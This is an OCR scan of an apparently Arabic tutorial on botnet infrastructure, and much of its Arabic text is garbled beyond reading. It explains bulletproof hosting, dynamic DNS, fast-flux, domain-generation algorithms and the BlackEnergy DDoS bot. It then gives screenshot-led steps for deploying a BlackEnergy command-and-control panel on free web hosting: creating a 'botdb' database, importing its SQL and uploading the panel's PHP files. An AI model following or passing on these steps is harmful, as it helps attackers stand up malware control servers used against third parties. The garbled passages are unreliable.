i( jVl Asu Cj jJI Jj^al jil (jjiA^lg^ll Aiijia cilUfc (Jjj^ C&C ^ O^J 'C&C L)^ ^ t° J^'j^J 

Bulletproof Hosting 

ia jjj^j l^J j ^ AiLjaloaVl Cjl£jJj £jja^i t'^lc . jj^> ^s^i^ ^ > djl£jJj l^^j c _^j3I <-<iAkJI c _^a Bulletproof hosting 

^LijllaJl jlaixJl A-ia. jj aIjj L-jLoi^JI (J^iLlj aJJ cJa Jj^^ (ill^ljlj aIS a^JjouJI ( jl > >ia ^^ic JjlxJl ^ lit .Aj-gI ja.] jl Almk ^jial JC-V 

l-j! uiaJl l. LaL j j£ iaia j-<iVl (jli 4*L<iAiJI ia jj^j ^J ^> c>« ^c. jll ^^ic Bulletproof hosting .^^^^^13 

Bulletproof hosting ^^V^? .Bulletproof hosting <aU^VI (>j ^ jij UJIL d^jjj bjjii aUUI 

j^ll 1^. Bulletproof hosting Ail > ^ >» i l ^ Jx^j li^j ^iii^ ^ jll J ^ (jjlxiU j^ Jil 
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tiL* J U f/ie Russian Business Network (RBN) ^ Bulletproof hosting AiLiaU ^SL* <> 1^1 j 

^tc j^JI .iijJI ^al j-<ij '"Phishing site" ^>VI ^al j-<JI j t^ni^ll ^l^JI ^il j-<* Ail > > uL la jj*-* RBN jj jf^j^ 

.dlL^Jfe (jJJ lalSalo ^f^al j tdljjljyi ^aj^a! ti^La Cllaaj^a) Lo <jlc jjuj j .4_i^LVI £§1 jaJI j '"spCWl Hosts" 

Jll jl^LSI tilti J jjjl ja cSBja dijlS jl .Liul ja (jfki V dii^ ^ jUJI J Bulletproof hosting Jj > >»^n* IiLujjj 

J^i* ciliSj ;<x^joJI ^jjuj ^ j^l Bulletproof hosting AiLjaiJ ^j>» ^ILa jl j^j^j jl < jt > ^ 1 <> JjIj ^a .ujj^ 

J yr^JJ^ j^' ^ t> ^^tj Jll <Lj jjiJl^ t-Li^j^ jLai Bulletproof hosting ^L^J ^jj* McColo 
a1 jjjoixi 4£jJa3l ^jl .vfon <jl£ tdjlj jjjjJI ^jl j* AiLJaloal (jc J^ill ^j^^j .Kolya McColo < — * j^*-* s-^^a j a!aIj-<JI 

b( JI*1I J g&>ll j jj^VI ^J^ t> ^ J 70 J'j^ t> 

Dynamic DNS 

IP u' "domain name" $^ ^ J ^ Dynamic domain name service (DDNS) 

La li& .4-J (j^al^J! XP (jl J^^^^ J^*-^ (jC- Jaill (J^*^ CL-flJjJaxJl (JJ^ Jj ajLudVI J JjJ ^ jjuJ JjUaill ^jujI ^jl J*J li& .(C j^ 
^Lq 4L_jIsl!I ^Iaj 6C_JJjll ~ M ^ < Igjjj^j tillj Jlft t J jialt ^ ^1 j^Jl jl ixJajVI ^ J-axJ ^jl! (jA ^ ui^U JUaII JaJt I^A 

^jjJI ^SL jl 4 (FTP) ^laLJl J>jjjjj 

Dynamic Host Configuration Protocol (DHCP)-assigned IP address. 

DDNS^j *i 

;4_JU3I Cj jlaaJI ^ laaa jJJjl ^ DDNS C> '^liloj^U 

.DDNS ^ j> f J^Jl - 
.i «i » ™l t J DDNS 

^1 j^V ^l^Vlj DDNS c> ^Ulai^ a1±^ jll 

b c^jjSjVI ^j^ii J*^h ^ j DDNS 

DDNS^j^ J- 

tAImaJl ( n ^ jJl Jl 1^1<^.jj ^alJ <illk-<Jl (IP) CijjljVI <jjjLc <J j£ jj aIa^LujI S ^.1^>JI Jasu DDNS C>* J^ 
^Vl (3^*-^ LiAic- JU^II (jc (jj^J La Asul ^Akll oAA j tAIlnaJl djLi^^Jl c ^1 aIa^LujI J <j JJ-^I 4jUacj jLlLj 

;4_JL3l l_j j;i*Jl Jc ^JJ^J <j| ClljjljVI ^jI L ; UjUdJ 

No-IP's zapto.org ^ JliiJI J^ "2LD domains" ( c5ji^JI CjlaU^) .kiaa <^U^ ^Ua^ 

.l^iLuiSI 3Jj^oj Jj ^^jj Lui ^hopto.orgj 
.ajjjoi^JI jjjliiill jj t \:r' ; "\: DDNS 
aj^la (jj^ii (jl dj jJI (jla ;^L^L^)JI Iaa l^j .cJ^^I Cy* 5JaSj « ^ijJa^SI J ^iJ ^<»L^)j DDNS ( ; lllajj 

Fast Fluxing 

J ^jjuj (^1 ^jjoJI La ^Fast Fluxing ^ j» J jaLu^II t*l j^ill ^ t jiu^j ^Lj^» JjS c>» <ijj»^ ^ l^ 'Flux 
a^I jll " jaII" (jlkjll ^jojI Jj Fast Fluxing j^Aj -IP lP^^ t<!UJI J .dP^ jjj^^ ^j^-^l ^j^JI 

# a^.Ij (jUaj ^jojV a - ^ aSI Saa*1a IP (jjjLc 4_^iii3lj ,(j^ J ojjixld jp (jjjLc Jj 

.IP flux Lbj'l 4ijj«-4 Fast Fluxing :<lajal4 
Cjajll ^ja cilLj (RR) DNS c> lS^ ^ round-robin DNS c> > Fast Fluxing <i^5 s^l j aLjL 
jp ojjL^ (> 4^la jj ^ ^ ^lj ip jlj^ ^ DNS ^U^VI c> tSllij .s j^a time-to-live (TTL) 
"fault tolerance" LSa^JI ^ ^L^illj "load balancing" ^J'j^ JjVI ^11<JI J ^ ^'^"j round-robin DNS ;4Jajal4 

4-uIa ^^Lua 
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.Fast Fluxing <> ^Ua 

Single flux 
Double flux 
Single flux 

I^ji .AijlLxJI Sj^iU IP (jjjlic flux 4-Sjj^ J a^lA] ip ^jjjUc m A^. jiill s^tcj Aijl^ a\\ cjVI ^vimi single flux 4-Sjj^i 
j ^L* Jj cjULiJIj cA AkSI jj d^IcU ^ j£i flux-agents 6 ^ .flux-agents ^^^j j-^ *^lcl ^ I jj^ ikb 

i> j^jj M .fast-flux <^ Cj1£j^3 ^jiill ^j^xJI ^ Fast-flux mothership .fast-flux mothership ^ 
V mother ships 'Single flux J < qj > ;-»Wi motherships < J^jj .HTTPj DNS 

.DNS ^ 

J I jj ^jj V jj/^I^-aII c> 6 ^ cs^ u^j^l <£*L^ J .<-^-£&VI c> mothership 4_>U^J Flux-agents ^j*^ ^ 
'flux-agents & IP u' J^ ^^J^ ^ ^ c> ^ o^J <* J-^ ( <j > ^ .. i^ l J*i3l ^UJI jl mothership ^ IP ul j&> 

c>j flux-agents mothership ^ ij^ u j* > ^ l M f^Jj mothership Jj ^-A^ ^ f j 

J> 

-flux-bots USa/l (j-^ Flux-agents :4Jajal* 

cA&iJ* ^Ua ila .<jj>AI jajj flux-agents ^I^jujI jli t^jj^Ull JjS l^iLuiSI jl ^ mothership 
flux-agent ^ ^ j ^3 U-^-a tdiSjl! s j^a cj! jja ^ jl jaUj DNS ^->^U^ single flux 

m j3 jla JJC. jl <JalL ul ^aJ 

.flux.example.com ^ ^ J 3 ^ <-k**^ < Jliall li* ^ .single flux lookup lU^ ^£ JtAI JiSill jjjj 

Aikio jl "cache" ^>AI ^jjj^all J Ul *l <IALa *M^j J^ai-AI DNS *SW^^ jl JUiAl li^ ^ (j^jjij U jc^ 

liA j . (jiA j^ll ^jojI <a^.jA ^lill ^I^iLojVI ^l^aj JjjaLAI DNS jAj cJ^*^^ u!^ "zone information" ji^i 
example.com ij ^ ikb .flux.address.com c> IP u^j^ example.com ^ ^ 
^.l ^l^ki^U flux.example.com Jl^jl 1^ J^*J^ .bulletproof hosting c> yr*^* j u^h jj^V^ ^ jki^ 

J . jlj^U Sjoiia IP (jjjU^ ^ a^j^ij &jjjAj ^ flux.example.com .9 SjJ^J! J V^^jj ^ ^ IP ojj^ 

0^3 .< i^t (^jl^l ^ jjlU ^mothership j mothership Jj ^^l^VI jj ^j»j flux-agent '1 lj 10 ^ j^^^ 
jil j* (Jjjla ^-a^ll jl "phishing site" ■y^N ^il j^ c qj>>>luij jl£ lij ^aU. j tdijjjjVl a£jj^ Jc; ^j^ ^ e>Juc ^ jj^JI jj^j 




Double Flux i- 

"glue records" ^-j^?^ o^j 6 6 ^ l?^^ DNS (joJ i" double flux" 4j>j*0*^ ^j^A^ ^f^> J 

jjj l_i*Jj Aijii^xJI CjVI .^UjjujVI cJj> > >n ^jjA j,j ^ s-LgjoiVI IP ^j! jjc j& " glue records" j^^^ cj^^L^joj .cimkll ^jj>i jA3 
v mothership CP <> j^jUj^^ ^ J j^j^ I^jI ^jj US J jjjS jj>jj ^ i^UJ! IP j < authoritative DNS 



https://www.facebook.com/tibea2004 
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<xJ a^.J ^ J^l i Jliall liA J .double flux lookup ^ lU- ^UjS Jtill JS^I o^j .U^l DNS j HTTP J^Sa 
u^j^ Aj^j t> ^ . jaL-^ cs^ 3 ) *J^' 6 ^ o^j 'single flux jljc- ^ 'flux.example.com o**j^ 

a^jj sjlcb ^ jll flux-agents JaSa c*1Lj l^jji ^bulletproof hosted ^U^VI aL^Ijj example.com *U^Vl 
(43 r 5 flux.example.com c> IP ojj^ (8 ^j 3 mothership ^ mothership J) (7 SjJaaJI) DNS cjUHi 

a£U* Aijjkj flux.example.com JL^VI I^j J^JI .J^LJl DNS J] flux-agents c> (9 SjJaaJI) dUjkJI 6 1a 

.JjLJI ^iSII J single flux J US 






example com 



■"mottrarship' 



12 



I 3 




Preferred DMS 



Huh c^omplc wm 



10 




I 



Clisnl 



Domain Fluxing 

d^)LU Uj (jj^j^ll .bot agent W^jj^ ^ u**j^ cs - ^ a£jjuj ^jla ;<LUJI ^.I^^Vl UjIj US 

<Jja j& ^jj ^^jII o^j^ jll &^<JI .AlnaJI ciaLi^ ^j;^ *U3^ f ^ ^l^c] cjULq ^a jl bot agent ^ 

.C&C t> bot agent <iajJ jj ^Ia^VI cjUL jl CjU jl^Jl l-l* m ^ jl bot agent j £^ ^W*^ 

Aijj-a Jl c^^jJ U* 'C&C ^jU^. Jc I jjSjj jjSI gaJ L_fl jjuj 6^ ^ a Aili tCj jill ^S^jI] Cj jJI .liui C&C (j^S-aJ 

■C&C j J-^VI t> bot agent £^ C&C oj*j^l ^ a^W*^ U jlc jilj .cjIjjjjjII 
jjuj Ala <C&C JUa25U j u^j^ V bot agent .C&C <^^V SjjUl^l djluiill V 

# dj ^Jl ^Jjuj Sj laJ i u ^JU.j o^jlill ^Jj^aJ 

.I^aIaj LgAuS ^ u^i .C&C (J\ Sj^U« J^^S 4^jIj ip cjjjUp |> iVhhi bot agent :<QajalA 

qjjaLai ^ jjoj j j^U i*uWi tjte. J jj^a^Jl SjjSSl I^jJ (JjjJ bot agent C&C ^-jVl^ajVI ^iaa ^J^aj 

bot agent jU^» ^ U*^ jlS U^x» j . JxilU ^ j o^jll Uc^ ^1 IP ojjUc^ jl jj^ j^ll ^l^klujU C&C J^jVI 5J jU^ ^ 

j-ol jVl JUjV Al AjjouIU Aijjia ^.jJ V -UV dl jJ! ^Jjoj jll I^A Jx^J US .C&C J^ 3 ^ J^^ UJ^ ^ 6 ^ 

.bot agent cl^j^^ J aj^JI 

jl ^jjjSjII cjliLi ^^ic ^UicVI (jj^ (Jaa j^ll ^l^cj ^ <j^aUJI a bjSal\ bot agent clA^j 

.DGA ^S^ liA J*^ c#^^ ^cr^^ .domain fluxing ^hr^ j cj! jji J^ cjjJI JjS 
jll I^j (J 1 gai^yi Jc liijlj ^ jl*-<» jjjc. (jlS-<i JUllj a^jjjoixJI cjI^a A\ Ua^ ls'^ u^^^^ L>^ (J^ 1 DGA 
^jUJU Jl > ^il^U B AjalijVI j .(jj.Vu^l Jia ^ia ^jj 1 $ jjS jj ^jc Jll j Aiajj^JI Ula B J^^^ J A J^^^ 

J djjjuxiSI CjUaLaJl (jV Ujj 6(JasU Asu ^aJ ^alajVI ^)! JU J (jSlj ,L_flj| j^Jl ^alajl ^j-d A_Ajla ~\ iklLujl J CjI jIuj Aau A 



https://www.facebook.com/tibea2004 
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a1 jJ3 a l^jl^ a\\ a kY\\ a a*U\a a1 jl^xi mL5 L LftS A <^-?^ ^* l>* ^ ( . 1 >J C5-^ c_ iUuL^lH ^ aJL^JI 

5jujVI 4SjVl (j^j *\ ikU j 4L_fljl^JI ^aj ^ JjVl ^^531 4SjVl 900 j 800 u£ ^J^' ikU j 4<ajjjuiJI ^jUsJI ja^ *j 

[Available Area Codes] - [Number between 800 and 900] - [Constant Last Digits, e.g., 5611] 

^aj L-ALaj ^5 A ^ j^-^ ^J' U' clH^ J J^^^ c^cLjaj j J jVI 4351511 ^ISjiU o^-a-a JLuaJ 101 ^ ^jj^ 3 ^ 

.(J^A 3 tj^^ (j -0 ^ j^ 1 ^^ 
^ jjlS ^t^h ^ tC&C .A urh^\ ij'^ bot agent c> 

J CjUuIxjII d^A L_fl^)XJj .C&C (Jlj^a^VI aJjL^xJ ^LdjJl tillj ^I^JjujI ^aJ (j-aj fi^Aa^a CjI <liLlJ (^^ic pLb ^Ldj^ ^UujjI ^ ^•j^kll 

DGA 

£>i& (j^i ^^joujjII ^jia^iJ! .djJt .iluj Jja ^ Ia jJij ^jj c _^j3I bot agent j» ^ uj^^ ^W^j^^ is* * \i A * ^ ^ j& DGA 
<s* o^j^ ^Ldjujl a alia a <c o ^cjjj DGA t^lc- .C&C ^ cJ^^^ I^I^jjojI bot agent ^ > "j c^^j u^j^ ^^^^ ^ 

u^j^^ t> 250 5^ Conficker.B DGAj Conficker.A DGA ^ JUJI ^ .^Ijl! ^jJI 
t> 500 JaSa e ^ia£i l^jli tCjlilk^l ^ t> j jjiJl jSlj tL^jj ^j^l! ^U^i <> 50,000 ^ Conficker.C DGA 

.Conficker.C 

CjUIaP (jAuajj ^121 CjI ajW*i1I (j-<a a £ujj l^JI 

Domain Fluxing 

Jjijjuj ^5^) j^c. jjuJ! <ajU3I l^jfll kiajj CjUijj c ^j3I "Domain" ^L^VI cjlilkj .^b jjoJI ^Ajlill ^ ^ n 

^4_LaJ! ^ixij^ll pUijajl 18 cl>^ jffi ^ Conficker ^^^^ cjljjiiiLJI ^jli tJllxJI 

.^11 C&C 

domain reputation systems 5^Jaj| jli ^UlUj ^jll ^> s s jial Ja^a l^l^kl^lj <il^L^ ^ ^Jjj 

.^A^jJa o^jlill ^Lgj^c (jj^J 

Domain Fluxing is ^ 

c^cjtnll (jjoii] ^.iJa^j DGAj t4lSaUJ!j *^ ja. ja ^ISjVl c> ,^ ui ^illj A is^^ ^ Clbau] DGA 

'u^^ cl>^ j 'NXDomains £y* a]&& ^ DGA .U^j^ cl^ ty* djU^£ ^cjjj ciijl£ bj ^aLk 

.jj^j^ jjp o^j^/J^j ^ju NXDOMAIN :Aiajal4 
^>ni j .DGA ^ ^iLkUl JUcVl j t*lli (jAJ AV Jaliill ^Bot Agent is* DGA uj*^ ^ ^ >^ 

<laj grj^j'" j sinkholing ^ j^^^l l_a^suj , JJaJill ^aLaJI ^LaJ! AiscaJ tilli asuj ^jj-dj^ll tilti - ^ 

:Luaj| lj jjp Sjp DGA ci^ 

DGA-capable malware ^j^j ^l^V jSaj j t^Ub jJaW ^> j^SII l_iW5 DGA ^ NXDomains 

J j^ »» i^ l Jjjj ^1 CjlaUaJI J^ij J^U. c> CjIjjjjjII s jia^JI ^> 0^^^ u^ 2 malware 's DGA component 

.sinkholing c^j j^ 5 c>j 



4-uIa ^^Lua 



dl jS\ fk*A m k^^A\ jUj^JI CjIa^a j ^Phishing attack" \:>^l dU^j* j ^ J*3I Ajj^I l>* *gr^ f^^s3 j^l ">»n 

dl j^VI ^)&^l J^' < — * J -^'l--^ (J-at^C-VI I^I^JjojV dl^UaxJl ^^G^Lal pb JjoJI (JjjuJI ^Uj dlJJ jA\ 

lgic« (jlx-a J;iiJl dlj^VI (j-a J^-*^ ( * w ^ L-lau ^11 (j>» dlj^VI £>i& (jl Jaak^lj (jl t . la>J (j^Jj t4_^LaJ! ^^^ic ja. j-<Jl 

.(jl*-* ^li-ll 4_Lgj (jl*-*!! 4_Laj 1 V J-^u V 6^)JJ^ dlJJ ^Jl dlj^l .<LgIxI3 (jla^su Vj Ja^a a (jj^J C5"^J 

<J-a-d} ^^-^-i ^>^l ^ j->gll cJSU -C5 ^.jL^. c ^jjJa^o ^gJc. jl (jjJC jjuJI ^jj-d^JjouJl S^G^' ^gic C&C r*^3 ^ ^juilj^Jl 6 ^ <^ 

liA ^ .Hamweqj TDL Botnet 'Zeus-based Botnets -USJ lU^j .^L-aiall ^ < a*jjal l Jati2 

(j!>Lk .d jJI (jx» 6 JJT \ s\ J J^-J J^J^ dLjV ^r^J^I ^1 g-LuJ ^aJ .dlJJ jJl (j^-J J." 4-^-^] 4)\aC* 

dtj jJj^)31 £>i& (JiLd pUj (j-a (jla^iJl j^ll ^a <J^j (jxi dtj jJj^)ll ^Ladj dlpl^^J j dl jjn^ t <i>^i j] L-l&ij L_fl jjoj AJUll djlj^ill 

4^l^o .^iixiill q^\jc>^ J-gI£3U J jj*-* jj'i^ ^ ^.1 I^a jjajj q\ ^j£U3I ^gJtjjjj .^^Lkll jl^VI ^ > Ig^hVi 

.DDoS ^ jVl HTTP cjlc- ^ j BlackEnergy Bot Ulj^i ^ 

BlackEnergy Bot 

jjjiajll cjjj o^a d^l£ j .pi jjll ^1 jjiuj ( » : ijaj ^ l^a. ^Ln^ jS^VI j^3I CjIa^J Cj jj jj£I jl£ BlackEnergy 
^jjoj jj] jIj^^jjojU t fll t o^j^. CjI Cj jJI 11a jjiaj .Darkness bot (UL^JI 1 (jc ^jI jl<» ^^ic Ia^. djjjlajj 
(j-<i ^cjIo dj jJI li^ (ji ci iijuj£ ^^jll j (C&C) o^Uall ^a^LkJ jj^JI ^^>^- l!^ 2 ^ uj^j^j ^ j^^j^ uj^y^ W-^^j^ 

-c ^jujj^)3I Cljjljyi ^ajl^J pb JJoJl (JjjoJI 

U£^j t\ Vqjq^l cJ^-^- il^^.j-G .^4^ ^1 ^<JI L-fll^Loal 6^j| Ja^ jl A3 j 4_xiJLiJl (j>j (jLd^pJI Cjlj^a (j-o <c j±Ld <c ^ ^ dj jA\ 11a 

^Uj jLi^ ^ C5^3j '^^il Aij^uJI cj! jl^aVI (jj^^c ^^ic (^Ij 'BlackEnergy ^^1 dljjl <c ^ ^^Jc J jj^a^JI ^ 
toolkit -SI 1^ ^ "anti-debugging features" gj^ > ^1 lU^j AV jj^ 3 polymorphic binaries 

l^Ld 6j^Ja fibVI i>i& .dULlJl S^C-li diUaixLxi Jia l& JJC. j dj jill ^^ic Sjlnj>n\\ PHP SCrfptS (j * > ^aJJ ( ^j3I j dliLJl (j* <C ^ £a 
.^b jjoJI (JjjoJI j!^. (j* l^ilc jj^^JI (j^-ftJ j (jVI <^.LaJl ^^ic l^J dlLcai j 6 j3 jj£I 4 ^ uoj 

BlackEnergy ^jujI ^2 Jl jikl 4_iLc^ ^ <!IL» 
http://threatpostxom/blackenergy-malware-used-in-attacks-against-in 

"Setting Up the Command and Control Server" C&C ^ ^! :1 Sj^t * 
pL^V ^ .C&C PHP ^AiL> ^ul JxilU cUu MySQL j PHP 'Apache ^ 

L_fl jjoj Lo I^Aj tilLlA (Jxij .SQL I^ILujI J Uj^I dlj jA\ dj!^jaj lai^J (jl 4jLuj (j-d (JjA^.j (jjiflail] dUUj o^cla 

^Ia^LujI ^aJ (j-d j Jxil^llj L_flJjJaxJl ^Uj jl A-ljl ^ a\\ AiLjaVI ^1 AjlxJjojVU ^a jfii (jl Loj (jjjkj^la cilLiA t <>J>>i^ pLodV 

Uj^J U£ ddns 

.^kVI (jc <L^)]all JjJaflJj LI j>Jl (jx» AjAslSI ^jjj ^31 J dljjljVI ^^ic 6j3 j2>Jl ^-ijl^xJl AiUiaVI ^1 (j* J^^l 

j> https://www.eb2a.com :^iU^yi ^1 ^ <Jial (> .Apache jMySQL j PHP ^l^i^l £ 

http://www.hostinger.ae 

jai (j^aLkJl ^aall ^-JiiLJii ^1 L_jl&i3lj ^a jlj .ciL (j^aLiJl L-flJjJaxJl dUUj jLaJjU ^ ^<Jl ^aj^J L_fl jjoj <Jj^ > all I A-il^C (j-d pl^ljVI AxJ 

i^Vl^ uj^ ^Ij <al^VI 
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Announcement 
Try Ihr nrw Script ln«tnllr»ri 

SOf taculous 




Find 

Find functions quickly by typing here. 

I I 



0 / Unlimited 





Preferences * 

*1 

By*! i hanga jjlj. Pram.um 
r U»n 9 uig« '"void 
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-t* Redirects Get a free 




MX 3PF E-t. 

Records Ana 


email Haft 

nts vv*^" a5 


- 


I>,ll.lb.V..". A 

phpMyA/lmin "^T"^* 


M*M ^*-» j^. »<«W 1 TP "fr tji L %-' 




/U13II 3-^Ui3l UlSis ^jIIj MySQL ^1 jS C5 1& jiill J^lk c_13ij cjUUj s^&IS ^L^L c_i jjuj Vji 




^ tgg Litt | Dragon City ... R Get random gem | Max... | DC Tool - Developed b... ^ Tool Dragon City - To... I lack Forums - I lackin... How To Budd A Ootne... fcj ^ ^.Ull w^Ul Google botnet . ddot . attack . ... 




'istapanel 



MyXQL Databases allow you to store lots of Information in an m s> fo access manner, rhe databases themselves are not 

management systems, and others. To use a database, you 'II need to create it. Only your MySOL Usemame (same as your 
control panel lOQin user) has privileges to access a database and read from or write to that database. 

ft VW*o Tuto— 1 | 

-^**» **JU J»" X Jr* MySOt > 
Create new database 



Create Database. | 

o <»»- r*«~» of «oo »<> . 

MvSQl i>h nami MvSQl um« nami MvSQl Password MvSQl f 

J a>> — — » j. — * ^.PhpMyAdmm . |A» >j- ifcM Ja— J . J p»j. — .u-] dei 



HAfKUP PHPMyAdmin 



Did yuu knii* |if»nmmi Ki.tling allow*, you tti i.rwaln individual MySQI umii and p»i vilagat? All pramium accounts Hava 




Create Database <ija j& botdb o^j ^.vli^ ^1 J*.^ 




♦ rp leb* 

3 f 99 tHt | Dragon City jj ^„ 




9 ^m |M*k... I DC Tool - Developed b... w> Tool Dragon City To Uavk Forum< - IUCJUW.- How To Bu.ld A Bo»n#... ^ ^ 
— ^> 

h»y:ij; r.ViMiMc«< a«nw ro cfor<i /<if< o/ information Jn an aa«y fo ar<v»c< mannar. rfia i4afar>aca< ff)am«a/^a< ara nof 

»••»•• raarf fjy fujmanv. My i/afafja<.a«. ara ra r a. .• fry rr«ariy wW; a; •/W.< afir>/i«. inrludmo wjm* bulletin (XMfrfl, fonfanf 

-.y-wfr-rrt-*, iiru/ ofrir-r-.. Jci ./-.r- a i/.-»fn/.a->r-, yuu /J rir-rr f / ftj i rnnfft if. f^rify ym/r My~iCJt IJ^trmnmr f'wirrjrr a-k your 



» -i> iax, MySCH av— i >. 



I OatatMiae: •b2a_13303S3»_ 
tTAir taatana-w | 



^ ^_ u i 400 — ^ - y . 



- J *M | al»?a_1fiMJ:th:ib_boldki v 



MYSiyL L>U Nami Hvr.yi U»H Nami Mv^Cfl Pamwurb MY.->yL Hum Nami Uairuc I'MI'HyA umii 

eb2a_lSS03SJS_botdb KUI 1 1 (Your cPanel Password) sol202.eb2a.com DacKuo I Adm.n 



* urPripMyAdmin • 



Old you know p 



| individual MySA, uc.r, »„d pnvil.,..' All pram.um Kfnune, h.v, 
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Admin ^ V jl jSj-L ^ ji-a * yi Vv*^ j toolkit ^ ^ s >^ 





Hitery 


Bookmark* 




■ | ■ | ■ | 1 


CP 




<■ (4 185.27.134.10 Ib_structure.php?db=eb2a_15503535_botdb v C | B ' Goo 9 te ~P\ & £ 4" # = 
^ Egg List | Dragon City ... [? ^nus : - Get random gem [Max... DC Tool - Developed b... _v Tool Dragon City - To... □ Hack Forums - Hackin... □ How To Build A Botne... R ^ yuoJidl Cjl>UI Google botnet . ddos . attack . ... » 


Lilsql202.byetcluster.c< 




> 0 eb2a_15503535_botdb 








>L Structure y SQL 


-4 Search Li) Query 


@ Export 


^ Import ,y Operations 


3$ Routines 



No tables found in database 



J] Create table 



Number of columns: 



® 



;aJU3I ^ ^ j^VI 3-*jUi Import cjj^ ^ 



t»V?7.H4.IO . 
3 tog Lut | Dragon City ... Wi Ajp 



OftnntfomqtmtMix.. j DC Tool ■ Developed b Tool Oregon City - To... , Hade t orumi • Hackin... Mow To Build A Botne. .. ^ ^, ^imjl 



I8V?7... 

f> -Cr iQ * #» 

< _i_«UJI Google botnet . ddos . ■ 



j* Structure i_j SQL < ..■ u. I. » i;... r V —* Import ^* Operations /rfft Routines 

Importing into the database "eb2a_1 5503535_botdb M 

Fllo to Import: 



Brows* your computer Browse. No file selected 
Character sat or the Mo | utf-8 [*] 

Partial Import 



(Max 3O0MiB) 



W Allow tha interruption ot an import in ca*e the senpt detects it is close to tha KHP timeout limit (this might Pa a good way to import largo ft/a*. rtotM->i/er /r can brmaK transaction* ) 
Number of iowj to skip, starting from the first row | O 



3 



itibility mode NONE 



JLojI go jjll ji^U f jSj db.sql <-— ili <•— ai* j& j s^tall ^jjja jSl t-tlli j Browse 



I m i«> ■ » ■ miyjj* 


& 185.27.134.10/import.php 


▼ C | |H - Google 




£ 4- A I = 


^ Egg List | Dragon City ... fi ; -- Get random gem [Max... DC Tool - Developed b... Tool Dragon City 


-To... □ Hack Forums - Hackin... □ How To Build A Botne... H ^yuJsdlc 


JL3-LJI Google 


J botnet . ddos . attack . ... » 


| rf! sql202.byetcluster.com » 0 eb2a_15503535_botdb 






P 


Y Structure j_ SQL , Search Query <^ Export ^> Import Operations ^ 


Routines 


✓ Import has been successfully finished, 3 queries executed, (db.sql) 








— Table structure for table 'opt* 






| > 


CS-ATi TABLE 'opf ( 

•name' varchar<2SS) NOT NULL, 

'value' varchar<255) NOT NULL, 






[ Edit ] 



Importing into the database "eb2a_1 5503535_botdb" 

File to Import: 



File may be compressed (gzip. bzip2. zip) or uncompressed. 

A compressed file's name must end in .[format]. [compression] Example: .sql.zip 

(Max: 300MiE3) 



Browse your computer: Browse- No file selected 
Character set of the file: utf-8 



Partial Import: 



[V] Allow the interruption of an import in case the script detects it is close to the PHP timeout limit. (This miaht be a oood wav to import lame files, however it can break transactions.) v 

jjeta (jja jajII ^ j ^LlojjjjII ^aall 
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B» m* ]t*ftw MigtiWy ft***™*.** I 



<- vt> l<S.7T.llJ.9.^n.4r>..nKp7Hp<:^n,'rr-lA;.J7.1Vj.l«Ahptc^n/i>« T inrt_?]RiiJ';»rnjirnr_^h. 1 '* I "i^rO 
< fccjg LrVl | Dmrjun Crty ... R Jyg^ii <-r &d nndsini |Moh... LH. r r-.,.,| [Jcvcl^pcd b 



I 1 duI Ongvn Lil r Ic... H«.k h'jruoii - Hfltkin... Htiw To EfuflJ i 

I lOO 1 ^- Script tirusl-ted nn 0.04 seconds 



P ED 4- ft ©- 

Gulnc... £;J ■■ " tIl^LJP tduuyl-c kutncL . ddtf! . attach . 




1— 11 -"-II—- II- 








— - — 1=- -xfiM— ir--- -ii- -II- i 


1 1 f .Hltl»».U«« 


Ivpe 

tWnarfn 


t i :.■ i . <*.• 

LCJ t Hi. 


JOOG IS^ISII iS-SCO 

& w a 


l f^rum Mm) Tlmnf Actions 

l>9 rwvr X' x r.ov 1 :0:=* 

|i..f ..f.. IWv 1 ICMiO Vp«» tiill 
hrrf — f — rtuv I iUiiftt V>mvt b-dll 
«♦» 1 10' a* VMw Ml 



Syr„l m*:.: u 

■Un^iectjg nue 



tOOlkit UJ^ yr^ php ^-iUL lai^JaJ ^ jij cilli Axj .<Lkl^J ^1 djUUl ^^a^ cJi^j htdOCS ^V*^ <-5 U^' (»J^ 

.Zip lafcJal l (JJ^J 



■ »■ 


1 Home Share View 








- © 


^ □ i" ^ 9k » X ■* si 

Copy Paste Move Copy Delete Rename New 
0 Paste shortcut to* to - * folder 


New item » 
■Q Easy access * 


l - ^ [lj.Open- ffl Select all 

@Edit Select none 
Properties ^ a - 

#ti History q 1 - 1 Invert selection 












Clipboard Organize 


New 


Open Select 






© » f i- ► This PC ► Removable Disk (D:) ► Black Energy ► 






v C Search www 





Favorites 


Name 


Date modified 


Type 


Size 


[_ Desktop 


auth.php 


6/4/200710:23 PM 


PHP File 


2 KB 


£. Downloads 


cmdhelp 


6/4/2007 10:26 PM 


HTML File 


2 KB 


Q Recent places 


\_\ config.php 


9/5/2009 2:28 PM 


PHP File 


1 KB 




index.php 


8/21/2009 2:54 PM 


PHP File 


6 KB 


A OneDrive 


□ MySQL.php 


4/24/2009 10:19 PM 


PHP File 


I KB 




, , stat.php 


6/4/2007 10:20 PM 


PHP File 


I KB 


*«J Homegroup 


§1 sty'e 


10/11/2006 1:14 PM 


Cascading Style S... 


I KB 



|/h>doc3 

Directory Tree: root /htdo< 



| Mew dr || New Be 1 1 Upload 1 1 Java Upload | 




Transform selected entries: | C 


opy | | Move | | De sts | | Renarre | | Chrrod 








Actions 


All Name/,J Type Size 


Owner 


Group Perms Mod Time 

This folder is empty 



Directories: 0 
Files: 0 / 0 B 
Symlinks: 0 

Unrecognized FTP output: 0 



4_uiLui3l Jj^-la l£^JH C5"^J 




Uploarl files and archives 
<£■' |_| 



Upload) to directory: <*iK»oeo 



ivoi (zip, tar. toz, oz) 



Wam Of On* tll«« r.ilnrt.rt |>y n«t JfTp to 10240 ktl «r»r1 by PHP to 2H 
» Th# m«Kirtiv.m (•*#rn!inn ttmo i« 30 ucond« 

• TKa » I >• tranafar mod* (ASCII or BINARY) will tx» ouiumoi.taHv dMtfmimd, b*»a<) on lh« filarvama 

• If ■>•- doatrnstion Mo •Iraady . • •. it w>ll be ov»'y»Mt«o 



.a/ 4^^1x11 ^jja jii ^ii Ja jkjja*l\ t aLdli ^l^o aj^j] browse c3j^ r» 
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9 ■ 


Wm 1- 


^p^^et2ftTx^B 




( j& 18527.134.9/index.php 




C 0" 7 = 


p\ <r m * # | = 


^ Egg List | Dragon City ... d$j ,jiua C> Get random gem [Max... 


DC Tool - Developed b... 


_j Tool Dragon City -To... {J Hack Forums - Hackin... □ How To Build A Botne... ffl ^ 


laJI Cjl>UI Google botnet . ddos . attack . ... » 




■■■■■■1 


Kl00% Script finished in 0.21 seconds 


A 




Directory Tree; root /ht 



| New dr 1 1 


he:: f e || Up Z3C | ,av3 Lp'oaa | 






